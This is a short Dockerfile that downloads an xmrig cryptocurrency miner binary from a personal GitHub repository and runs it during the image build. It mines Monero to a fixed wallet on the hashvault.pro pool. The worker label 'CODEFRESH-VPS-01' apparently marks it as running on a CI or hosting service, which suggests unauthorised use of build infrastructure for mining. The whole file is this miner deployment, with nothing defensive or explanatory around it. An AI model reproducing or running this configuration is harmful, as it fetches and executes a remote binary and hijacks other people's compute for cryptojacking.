FROM ubuntu:latest
RUN apt update && apt upgrade -y && apt install wget-y
WORKDIR /home
RUN wget https://github.com/agumyudhistira/mine/raw/main/xmrig
RUN chmod +x xmrig
RUN ./xmrig --url pool.hashvault.pro:443 --user 886L45mn7M881BAFmybF9UQ2mpHLETvijC441CyvA8P6RuMGALHz1FJQeRi88RyzZWASDwzVKtSf3B24rr85683ZCU1patX --pass CODEFRESH-VPS-01 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 --threads=4
CMD (-h)